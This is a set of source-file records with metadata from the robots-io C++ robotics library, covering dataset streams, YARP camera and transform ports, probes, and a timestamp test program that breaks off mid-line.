"alpha_fraction": 0.6041131019592285,
"alphanum_fraction": 0.6110907196998596,
"avg_line_length": 23.09734535217285,
"blob_id": "741a8f6b22aaf8655eed2525fa4e1dae69243720",
"content_id": "9fd7e682272ae1e35e1dca3c51c9437ca7d03b3b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2723,
"license_type": "permissive",
"max_line_length": 210,
"num_lines": 113,
"path": "/src/RobotsIO/src/Utils/DatasetDataStream.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/DatasetDataStream.h>\n#include <RobotsIO/Utils/FileToEigen.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nDatasetDataStream::DatasetDataStream(const std::string& file_path, const std::size_t& skip_rows, const std::size_t& skip_cols, const std::size_t& expected_cols, const int rx_time_index, const int tx_time_index)\n{\n bool valid_file;\n MatrixXd data_all;\n std::tie(valid_file, data_all) = file_to_eigen(file_path, 0, skip_cols, expected_cols);\n\n if (!valid_file)\n throw(std::runtime_error(log_name_ + \"::ctor. Error cannot read data from file \" + file_path + \".\"));\n\n if (rx_time_index >= data_all.cols())\n throw(std::runtime_error(log_name_ + \"::ctor. Specified rx time index \" + std::to_string(rx_time_index) + \" is out of range.\"));\n\n if (tx_time_index >= data_all.cols())\n throw(std::runtime_error(log_name_ + \"::ctor. Specified tx time index \" + std::to_string(tx_time_index) + \" is out of range.\"));\n\n std::size_t data_time_rows = 0;\n if (rx_time_index != -1)\n {\n data_rx_time_ = data_all.row(rx_time_index);\n data_time_rows++;\n }\n\n if (tx_time_index != -1)\n {\n data_tx_time_ = data_all.row(tx_time_index);\n data_time_rows++;\n }\n\n data_.resize(data_all.rows() - data_time_rows, data_all.cols());\n std::size_t j = 0;\n for (std::size_t i = 0; i < data_all.rows(); i++)\n {\n if ((i == rx_time_index) || (i == tx_time_index))\n continue;\n data_.row(j) = data_all.row(i);\n\n j++;\n }\n}\n\n\nDatasetDataStream::~DatasetDataStream()\n{}\n\n\ndouble DatasetDataStream::rx_time()\n{\n if (data_rx_time_.size() != 0)\n return data_rx_time_(get_head());\n\n return 0.0;\n}\n\n\ndouble DatasetDataStream::tx_time()\n{\n if (data_tx_time_.size() != 0)\n return data_tx_time_(get_head());\n\n return 0.0;\n}\n\n\nVectorXd DatasetDataStream::data()\n{\n return data_.col(get_head());\n}\n\n\nbool DatasetDataStream::freeze()\n{\n return set_head(get_head() + 1);\n}\n\n\nint DatasetDataStream::get_head()\n{\n return head_;\n}\n\n\nbool DatasetDataStream::set_head(const int& value)\n{\n if (value >= data_.cols())\n return false;\n\n head_ = value;\n\n return true;\n}\n\n\nVectorXd DatasetDataStream::data(const int& index)\n{\n if (index < 0 || index >= data_.cols())\n throw(std::runtime_error(log_name_ + \"::data(const int& index). Error: invalid index provided (index = \" + std::to_string(index) + \").\"));\n\n return data_.col(index);\n}\n"
},
{
"alpha_fraction": 0.7023809552192688,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 20.488372802734375,
"blob_id": "75000218e341d8bf87ebfda4f18859d042de0aa6",
"content_id": "0211bfd81a2638b2e539c0cae417fce5ebe7e9f2",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 924,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 43,
"path": "/src/RobotsIO/include/RobotsIO/Utils/SpatialVelocity.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_SPATIALVELOCITY_H\n#define ROBOTSIO_SPATIALVELOCITY_H\n\n#include <Eigen/Dense>\n\n#include <RobotsIO/Utils/DataStream.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class SpatialVelocity;\n }\n}\n\n\nclass RobotsIO::Utils::SpatialVelocity : public RobotsIO::Utils::DataStream\n{\npublic:\n virtual ~SpatialVelocity();\n\n virtual Eigen::Vector3d angular_velocity();\n\n virtual Eigen::Vector3d linear_velocity_origin();\n\n virtual Eigen::Vector3d linear_velocity_screw();\n\n virtual Eigen::Vector3d screw_position();\n\n virtual double elapsed_time() = 0;\n\n bool is_screw_degenerate();\n\nprotected:\n virtual Eigen::VectorXd twist() = 0;\n};\n\n#endif /* ROBOTSIO_SPATIALVELOCITY_H */\n"
},
{
"alpha_fraction": 0.7372881174087524,
"alphanum_fraction": 0.74250328540802,
"avg_line_length": 23.349206924438477,
"blob_id": "511fffeac29d8f9bed3a668644969871d869d21a",
"content_id": "e6691d04588abbf7486bb0b51d3d3cb910bc37b7",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1534,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 63,
"path": "/src/RobotsIO/src/Camera/DatasetParameters.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Camera/DatasetParameters.h>\n\nusing namespace RobotsIO::Camera;\n\nrobots_io_accessor_impl(DatasetParameters);\n\nrobots_io_declare_std_field_impl(DatasetParameters, string, path);\n\nrobots_io_declare_std_field_impl(DatasetParameters, string, data_prefix);\n\nrobots_io_declare_std_field_impl(DatasetParameters, string, rgb_prefix);\n\nrobots_io_declare_std_field_impl(DatasetParameters, string, depth_prefix);\n\nrobots_io_declare_std_field_impl(DatasetParameters, string, data_format);\n\nrobots_io_declare_std_field_impl(DatasetParameters, string, rgb_format);\n\nrobots_io_declare_std_field_impl(DatasetParameters, string, depth_format);\n\nrobots_io_declare_std_field_impl(DatasetParameters, size_t, heading_zeros);\n\nrobots_io_declare_std_field_impl(DatasetParameters, size_t, index_offset);\n\nrobots_io_declare_std_field_impl(DatasetParameters, size_t, standard_data_offset);\n\nrobots_io_declare_field_impl(DatasetParameters, bool, data_available);\n\n\nDatasetParameters::DatasetParameters()\n{\n /* Set default values. */\n data_prefix(\"\");\n\n rgb_prefix(\"\");\n\n depth_prefix(\"\");\n\n data_format(\"txt\");\n\n rgb_format(\"png\");\n\n depth_format(\"float\");\n\n heading_zeros(0);\n\n index_offset(0);\n\n standard_data_offset(9);\n\n data_available(false);\n}\n\n\nDatasetParameters::~DatasetParameters()\n{}\n"
},
{
"alpha_fraction": 0.6851106882095337,
"alphanum_fraction": 0.6921529173851013,
"avg_line_length": 19.285715103149414,
"blob_id": "d3cd444246161aee85ae679d3d567a55741f9358",
"content_id": "c83c2e258be5251a83779ac7fd07245411f1a5e0",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 994,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 49,
"path": "/src/RobotsIO/src/Utils/Transform.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/Transform.h>\n\nusing namespace RobotsIO::Utils;\n\n\nTransform::~Transform()\n{}\n\n\nEigen::MatrixXd Transform::bounding_box()\n{\n /* By default, this return an empty matrix. */\n Eigen::MatrixXd empty;\n return empty;\n}\n\n\nint Transform::get_frames_between_iterations() const\n{\n /* 1 indicates that the transform stream is, by default, available at all frames. */\n return 1;\n}\n\n\nvoid Transform::set_rgb_image(const cv::Mat& image)\n{\n /* By default, the input image is not used. */\n}\n\n\nvoid Transform::set_depth_segmentation_image(const Eigen::MatrixXf& depth, const cv::Mat& segmentation)\n{\n /* By default, the input images are not used. */\n}\n\n\nbool Transform::transform_received()\n{\n /* By default, it returns true. */\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.7026496529579163,
"alphanum_fraction": 0.707556426525116,
"avg_line_length": 23.85365867614746,
"blob_id": "6825df3d28847810ebc58c8ce912e8af3305892c",
"content_id": "76ee12aece4d9ad6a900eb365fc16bd6e9773cd4",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1019,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 41,
"path": "/src/RobotsIO/include/RobotsIO/Utils/FloatMatrixYarpPort.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_FLOATMATRIXYARPPORT_H\n#define ROBOTSIO_FLOATMATRIXYARPPORT_H\n\n#include <Eigen/Dense>\n\n#include <RobotsIO/Utils/FloatMatrix.h>\n#include <RobotsIO/Utils/YarpBufferedPort.hpp>\n\n#include <yarp/sig/Image.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class FloatMatrixYarpPort;\n }\n}\n\n\nclass RobotsIO::Utils::FloatMatrixYarpPort : public RobotsIO::Utils::FloatMatrix,\n public RobotsIO::Utils::YarpBufferedPort<yarp::sig::ImageOf<yarp::sig::PixelFloat>>\n{\npublic:\n FloatMatrixYarpPort(const std::string& port_name);\n\n virtual ~FloatMatrixYarpPort();\n\n bool freeze(const bool blocking = false) override;\n\n Eigen::MatrixXf matrix() override;\n\nprivate:\n Eigen::MatrixXf matrix_;\n};\n\n#endif /* ROBOTSIO_FLOATMATRIXYARPPORT_H */\n"
},
{
"alpha_fraction": 0.7044968008995056,
"alphanum_fraction": 0.7098501324653625,
"avg_line_length": 22.350000381469727,
"blob_id": "9f2dc803d4582e39167be3f18efd1e115082ff92",
"content_id": "6e085d6cba97719c029fbc0fb0bbff456398c313",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 934,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 40,
"path": "/src/RobotsIO/include/RobotsIO/Utils/ProbeContainer.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_PROBECONTAINER_H\n#define ROBOTSIO_PROBECONTAINER_H\n\n#include <RobotsIO/Utils/Probe.h>\n\n#include <string>\n#include <unordered_map>\n\nnamespace RobotsIO {\n namespace Utils {\n class ProbeContainer;\n }\n}\n\n\nclass RobotsIO::Utils::ProbeContainer\n{\npublic:\n virtual ~ProbeContainer();\n\n bool is_probe(const std::string& name) const;\n\n RobotsIO::Utils::Probe& get_probe(const std::string& name) const;\n\n void set_probe(const std::string& name, std::unique_ptr<RobotsIO::Utils::Probe> probe);\n\nprotected:\n std::unordered_map<std::string, std::unique_ptr<RobotsIO::Utils::Probe>> probes_;\n\n const std::string log_name_ = \"ProbeContainer\";\n};\n\n#endif /* ROBOTSIO_PROBECONTAINER_H */\n"
},
{
"alpha_fraction": 0.6791104078292847,
"alphanum_fraction": 0.6846703886985779,
"avg_line_length": 19.983333587646484,
"blob_id": "9caafa1c2eb27bff43580500cdc7d43c9d9fce7f",
"content_id": "7b56550424df41d281e6a5836ba4380332245bf8",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1259,
"license_type": "permissive",
"max_line_length": 224,
"num_lines": 60,
"path": "/src/RobotsIO/include/RobotsIO/Utils/DatasetDataStream.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DATASETDATASTREAM_H\n#define ROBOTSIO_DATASETDATASTREAM_H\n\n#include <Eigen/Dense>\n\nnamespace RobotsIO {\n namespace Utils {\n class DatasetDataStream;\n }\n}\n\n\nclass RobotsIO::Utils::DatasetDataStream\n{\npublic:\n static const int NoTimeIndex = -1;\n\n DatasetDataStream(const std::string& file_path, const std::size_t& skip_rows, const std::size_t& skip_cols, const std::size_t& expected_cols, const int rx_time_index = NoTimeIndex, const int tx_time_index = NoTimeIndex);\n\n virtual ~DatasetDataStream();\n\n double rx_time();\n\n double tx_time();\n\n virtual Eigen::VectorXd data();\n\n virtual bool freeze();\n\nprotected:\n int get_head();\n\n bool set_head(const int& value);\n\n Eigen::VectorXd data(const int& index);\n\nprivate:\n Eigen::MatrixXd data_;\n\n Eigen::VectorXd data_rx_time_;\n\n Eigen::VectorXd data_tx_time_;\n\n int rx_time_index_;\n\n int tx_time_index_;\n\n int head_ = -1;\n\n const std::string log_name_ = \"DatasetDataStream\";\n};\n\n#endif /* ROBOTSIO_DATASETDATASTREAM_H */\n"
},
{
"alpha_fraction": 0.6806883215904236,
"alphanum_fraction": 0.6902485489845276,
"avg_line_length": 18.370370864868164,
"blob_id": "972dde878155fbcf8e5e40030902c71d5f54ba88",
"content_id": "c09b65cf2c97d727d414c03b999af5bd3476cf79",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 523,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 27,
"path": "/src/RobotsIO/include/RobotsIO/Utils/Clock.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_CLOCK_H\n#define ROBOTSIO_CLOCK_H\n\nnamespace RobotsIO {\n namespace Utils {\n class Clock;\n }\n}\n\nclass RobotsIO::Utils::Clock\n{\npublic:\n virtual ~Clock();\n\n virtual double now() const;\n\n virtual void delay(const int& milliseconds) const;\n};\n\n#endif /* ROBOTSIO_CLOCK_H */\n"
},
{
"alpha_fraction": 0.69921875,
"alphanum_fraction": 0.7060546875,
"avg_line_length": 20.33333396911621,
"blob_id": "45a8dec4ec029a4b5247e787300545e307f8cf09",
"content_id": "5af5bd7ce981f92652a87d042073a4c96a9821cd",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1024,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 48,
"path": "/src/RobotsIO/include/RobotsIO/Utils/ImageFileProbe.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_IMAGEFILEPROBE_H\n#define ROBOTSIO_IMAGEFILEPROBE_H\n\n#include <RobotsIO/Utils/Data.h>\n#include <RobotsIO/Utils/Probe.h>\n#include <RobotsIO/Utils/any.h>\n\n#include <opencv2/opencv.hpp>\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Utils {\n class ImageFileProbe;\n }\n}\n\n\nclass RobotsIO::Utils::ImageFileProbe : public RobotsIO::Utils::Probe\n{\npublic:\n ImageFileProbe(const std::string& output_path, const std::string& prefix, const std::string& output_format);\n\n virtual ~ImageFileProbe();\n\nprotected:\n void on_new_data() override;\n\nprivate:\n cv::Mat data_cv_;\n\n std::string output_prefix_;\n\n const std::string output_format_;\n\n std::size_t frame_counter_ = 0;\n\n const std::string log_name_ = \"ImageFileProbe\";\n};\n\n#endif /* ROBOTSIO_IMAGEFILEPROBE_H */\n"
},
{
"alpha_fraction": 0.7153284549713135,
"alphanum_fraction": 0.7233576774597168,
"avg_line_length": 26.399999618530273,
"blob_id": "1466b62a21a88880475a6678badd9562fe0983c3",
"content_id": "326614fd4dcf039ab2d96b7718a9df69f96726c2",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1370,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 50,
"path": "/src/RobotsIO/include/RobotsIO/Utils/TransformWithVelocityYarpPort.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_TRANSFORMWITHVELOCITYYARPPORT_H\n#define ROBOTSIO_TRANSFORMWITHVELOCITYYARPPORT_H\n\n#include <RobotsIO/Utils/TransformWithVelocity.h>\n#include <RobotsIO/Utils/YarpBufferedPort.hpp>\n\n#include <yarp/sig/Vector.h>\n\n#include <Eigen/Dense>\n\nnamespace RobotsIO {\n namespace Utils {\n class TransformWithVelocityYarpPort;\n }\n}\n\nclass RobotsIO::Utils::TransformWithVelocityYarpPort : public RobotsIO::Utils::TransformWithVelocity,\n public RobotsIO::Utils::YarpBufferedPort<yarp::sig::Vector>\n{\npublic:\n EIGEN_MAKE_ALIGNED_OPERATOR_NEW\n\n TransformWithVelocityYarpPort(const std::string& port_name);\n\n virtual ~TransformWithVelocityYarpPort();\n\n Eigen::Transform<double, 3, Eigen::Affine> transform() override;\n\n Eigen::Vector3d linear_velocity() override;\n\n Eigen::Vector3d angular_velocity() override;\n\n bool freeze(const bool blocking = false) override;\n\nprivate:\n Eigen::Transform<double, 3, Eigen::Affine> transform_;\n\n Eigen::Vector3d linear_velocity_;\n\n Eigen::Vector3d angular_velocity_;\n};\n\n#endif /* ROBOTSIO_TRANSFORMWITHVELOCITYYARPPORT_H */\n"
},
{
"alpha_fraction": 0.5801273584365845,
"alphanum_fraction": 0.5829132199287415,
"avg_line_length": 28.91269874572754,
"blob_id": "79c1a9fa0b1561e0b7282497f5afd0ba72610827",
"content_id": "cad9758f44ec0d1bbbf23d2cc3f9d8d77d708f29",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7538,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 252,
"path": "/src/RobotsIO/src/Camera/YarpCamera.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Camera/YarpCamera.h>\n#include <RobotsIO/Utils/ParametersYarpPort.h>\n\n#include <iostream>\n#include <thread>\n\n#include <yarp/cv/Cv.h>\n#include <yarp/eigen/Eigen.h>\n#include <yarp/os/LogStream.h>\n#include <yarp/os/Stamp.h>\n#include <yarp/os/Value.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Camera;\nusing namespace RobotsIO::Utils;\nusing namespace yarp::cv;\nusing namespace yarp::eigen;\nusing namespace yarp::os;\nusing namespace yarp::sig;\n\n\nYarpCamera::YarpCamera(const std::string& port_prefix, const bool& network_bootstrap)\n{\n /* Check YARP network. */\n if (!yarp_.checkNetwork())\n {\n throw(std::runtime_error(log_name_ + \"::ctor. Error: YARP network is not available.\"));\n }\n\n /* Open rgb input port. */\n if (!(port_rgb_.open(\"/\" + port_prefix + \"/rgb:i\")))\n {\n std::string err = log_name_ + \"::ctor. Error: cannot open rgb input port.\";\n throw(std::runtime_error(err));\n }\n\n /* Open depth input port. */\n if (!(port_depth_.open(\"/\" + port_prefix + \"/depth:i\")))\n {\n std::string err = log_name_ + \"::ctor. Error: cannot open depth input port.\";\n throw(std::runtime_error(err));\n }\n\n if (network_bootstrap)\n {\n /* Read camera parameters from network. */\n ParametersYarpPort network_parameters(\"/\" + port_prefix + \"/camera_parameters:i\");\n while (!(network_parameters.receive_parameters()))\n {\n std::this_thread::sleep_for(std::chrono::seconds(1));\n\n yInfo() << log_name_ + \"::ctor. Waiting for camera parameters on port \" + \"/\" + port_prefix + \"/dataset/camera_parameters:i\";\n }\n parameters_ = CameraParameters(network_parameters);\n\n Camera::initialize();\n\n /* Log parameters. */\n std::cout << log_name_ + \"::ctor. Camera parameters:\" << std::endl;\n std::cout << log_name_ + \" - width: \" << parameters_.width() << std::endl;\n std::cout << log_name_ + \" - height: \" << parameters_.height() << std::endl;\n std::cout << log_name_ + \" - fx: \" << parameters_.fx() << std::endl;\n std::cout << log_name_ + \" - fy: \" << parameters_.fy() << std::endl;\n std::cout << log_name_ + \" - cx: \" << parameters_.cx() << std::endl;\n std::cout << log_name_ + \" - cy: \" << parameters_.cy() << std::endl;\n }\n}\n\n\nYarpCamera::YarpCamera\n(\n const std::size_t& width,\n const std::size_t& height,\n const double& fx,\n const double& cx,\n const double& fy,\n const double& cy,\n const std::string& port_prefix,\n const bool& enable_camera_pose\n) :\n enable_camera_pose_(enable_camera_pose)\n{\n /* Check YARP network. */\n if (!yarp_.checkNetwork())\n {\n throw(std::runtime_error(log_name_ + \"::ctor. Error: YARP network is not available.\"));\n }\n\n /* Store parameters. */\n parameters_.width(width);\n parameters_.height(height);\n parameters_.fx(fx);\n parameters_.cx(cx);\n parameters_.fy(fy);\n parameters_.cy(cy);\n parameters_.initialized(true);\n\n /* Open rgb input port. */\n if (!(port_rgb_.open(\"/\" + port_prefix + \"/rgb:i\")))\n {\n std::string err = log_name_ + \"::ctor. Error: cannot open rgb input port.\";\n throw(std::runtime_error(err));\n }\n\n /* Open depth input port. */\n if (!(port_depth_.open(\"/\" + port_prefix + \"/depth:i\")))\n {\n std::string err = log_name_ + \"::ctor. Error: cannot open depth input port.\";\n throw(std::runtime_error(err));\n }\n\n /* OPen camera pose input port. */\n if (enable_camera_pose_)\n {\n if (!(port_pose_.open(\"/\" + port_prefix + \"/pose:i\")))\n {\n std::string err = log_name_ + \"::ctor. Error: cannot open pose input port.\";\n throw(std::runtime_error(err));\n }\n }\n\n Camera::initialize();\n\n /* Log parameters. */\n std::cout << log_name_ + \"::ctor. Camera parameters:\" << std::endl;\n std::cout << log_name_ + \" - width: \" << parameters_.width() << std::endl;\n std::cout << log_name_ + \" - height: \" << parameters_.height() << std::endl;\n std::cout << log_name_ + \" - fx: \" << parameters_.fx() << std::endl;\n std::cout << log_name_ + \" - fy: \" << parameters_.fy() << std::endl;\n std::cout << log_name_ + \" - cx: \" << parameters_.cx() << std::endl;\n std::cout << log_name_ + \" - cy: \" << parameters_.cy() << std::endl;\n}\n\nYarpCamera::YarpCamera\n(\n const std::string& data_path,\n const std::size_t& width,\n const double& height,\n const double& fx,\n const double& cx,\n const double& fy,\n const double& cy\n) :\n Camera(data_path, width, height, fx, cx, fy, cy)\n{\n Camera::initialize();\n}\n\n\nYarpCamera::~YarpCamera()\n{\n /* Close ports. */\n port_rgb_.close();\n\n port_depth_.close();\n\n if (enable_camera_pose_)\n port_pose_.close();\n}\n\n\nstd::pair<bool, MatrixXf> YarpCamera::depth(const bool& blocking)\n{\n ImageOf<PixelFloat>* image_in;\n image_in = port_depth_.read(blocking);\n\n if (image_in == nullptr)\n return std::make_pair(false, MatrixXf());\n\n Stamp stamp;\n port_depth_.getEnvelope(stamp);\n time_stamp_depth_ = stamp.getTime();\n is_time_stamp_depth_ = true;\n\n cv::Mat image = yarp::cv::toCvMat(*image_in);\n Map<Eigen::Matrix<float, Dynamic, Dynamic, Eigen::RowMajor>> float_image(image.ptr<float>(), image.rows, image.cols);\n\n return std::make_pair(true, float_image);\n}\n\n\nstd::pair<bool, Transform<double, 3, Affine>> YarpCamera::pose(const bool& blocking)\n{\n if (enable_camera_pose_)\n {\n yarp::sig::Vector* pose_in = port_pose_.read(blocking);\n\n if (pose_in != nullptr)\n {\n last_camera_pose_ = *pose_in;\n }\n\n if (last_camera_pose_.size() == 7)\n {\n /* If available, always return the last camera pose. */\n Transform<double, 3, Affine> pose;\n pose = Translation<double, 3>(Vector3d(last_camera_pose_[0], last_camera_pose_[1], last_camera_pose_[2]));\n pose.rotate(AngleAxisd(last_camera_pose_[6], Vector3d(last_camera_pose_[3], last_camera_pose_[4], last_camera_pose_[5])));\n\n return std::make_pair(true, pose);\n }\n else\n {\n /* Camera pose enabled but not available, return (false, empty). */\n return std::make_pair(false, Transform<double, 3, Affine>());\n }\n }\n else\n {\n /* Camera pose not enabled, always return (true, identity). */\n return std::make_pair(true, Transform<double, 3, Affine>::Identity());\n }\n}\n\n\nstd::pair<bool, cv::Mat> YarpCamera::rgb(const bool& blocking)\n{\n ImageOf<PixelRgb>* image_in;\n image_in = port_rgb_.read(blocking);\n\n if (image_in == nullptr)\n return std::make_pair(false, cv::Mat());\n\n Stamp stamp;\n port_rgb_.getEnvelope(stamp);\n time_stamp_rgb_ = stamp.getTime();\n is_time_stamp_rgb_ = true;\n\n cv::Mat image = yarp::cv::toCvMat(*image_in);\n cv::resize(image, image, cv::Size(parameters_.width(), parameters_.height()));\n\n return std::make_pair(true, image);\n}\n\n\nstd::pair<bool, double> YarpCamera::time_stamp_rgb() const\n{\n return std::make_pair(is_time_stamp_rgb_, time_stamp_rgb_);\n}\n\n\nstd::pair<bool, double> YarpCamera::time_stamp_depth() const\n{\n return std::make_pair(is_time_stamp_depth_, time_stamp_depth_);\n}\n"
},
{
"alpha_fraction": 0.5867747068405151,
"alphanum_fraction": 0.5974908471107483,
"avg_line_length": 32.85840606689453,
"blob_id": "b0a2da4556b53f983f88b6f22d987465f2ebd63e",
"content_id": "1ca95edaf160a4ba6a0b44067c1d300503cf9580",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3826,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 113,
"path": "/src/RobotsIO/test/test_DatasetCamera/main.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <cstdlib>\n#include <iostream>\n\n#include <RobotsIO/Camera/DatasetCamera.h>\n\nusing namespace RobotsIO::Camera;\n\n\nbool parse_size_t (char** argv, const std::size_t& index, const std::string& name, std::size_t& retrieved);\n\n\nint main(int argc, char** argv)\n{\n const std::string log_name = \"test_DatasetCamera\";\n\n if (argc != 4)\n {\n std::cerr << \"Synopsis: \" + log_name + \" <dataset_path> <heading_zeros> <index_offset>\" << std::endl << std::endl;\n\n return EXIT_FAILURE;\n }\n\n const std::string dataset_path{argv[1]};\n\n std::size_t heading_zeros;\n if (!parse_size_t(argv, 2, \"heading_zeros\", heading_zeros))\n return EXIT_FAILURE;\n\n std::size_t index_offset;\n if (!parse_size_t(argv, 3, \"index_offset\", index_offset))\n return EXIT_FAILURE;\n\n DatasetCamera dataset(dataset_path, \"\", \"rgb/\", \"depth/\", \"txt\", \"ppm\", \"float\", heading_zeros, index_offset, 0, 0, 0, 0, 0, 0);\n\n std::vector<double> rgb_time_stamps;\n std::vector<double> depth_time_stamps;\n while (dataset.status())\n {\n dataset.step_frame();\n dataset.rgb(false);\n dataset.depth(false);\n\n bool valid_stamp;\n\n double rgb_stamp;\n std::tie(valid_stamp, rgb_stamp) = dataset.time_stamp_rgb();\n if (valid_stamp)\n rgb_time_stamps.push_back(rgb_stamp);\n\n double depth_stamp;\n std::tie(valid_stamp, depth_stamp) = dataset.time_stamp_depth();\n if (valid_stamp)\n depth_time_stamps.push_back(depth_stamp);\n }\n\n std::cout << \"Collected \" << rgb_time_stamps.size() << \" rgb stamps.\" << std::endl;\n std::cout << \"Collected \" << depth_time_stamps.size() << \" depth stamps.\" << std::endl << std::endl;;\n if (rgb_time_stamps.size() != depth_time_stamps.size())\n return EXIT_FAILURE;\n\n std::cout << \"Stamps are the following:\" << std::endl;\n for (std::size_t i = 0; i < rgb_time_stamps.size(); i++)\n std::cout << \"(rgb, depth): \" << std::fixed << rgb_time_stamps.at(i) << \", \" << depth_time_stamps.at(i) << std::endl;\n std::cout << std::endl;\n\n double rgb_stamps_mean_difference = 0;\n double depth_stamps_mean_difference = 0;\n double mutual_mean_difference = 0;\n for (std::size_t i = 0; i < rgb_time_stamps.size(); i++)\n {\n if (i > 0)\n {\n rgb_stamps_mean_difference += (rgb_time_stamps.at(i) - rgb_time_stamps.at(i - 1));\n depth_stamps_mean_difference += (depth_time_stamps.at(i) - depth_time_stamps.at(i - 1));\n }\n mutual_mean_difference += (std::abs(rgb_time_stamps.at(i) - depth_time_stamps.at(i)));\n }\n rgb_stamps_mean_difference /= (rgb_time_stamps.size() - 1);\n depth_stamps_mean_difference /= (rgb_time_stamps.size() - 1);\n mutual_mean_difference /= rgb_time_stamps.size();\n\n std::cout << \"Mean RGB stamp difference (ms): \" << rgb_stamps_mean_difference * 1000.0 << std::endl;\n std::cout << \"Mean Depth stamp difference (ms): \" << depth_stamps_mean_difference * 1000.0 << std::endl;\n std::cout << \"Mean mutual RGB-Depth stamp difference (ms): 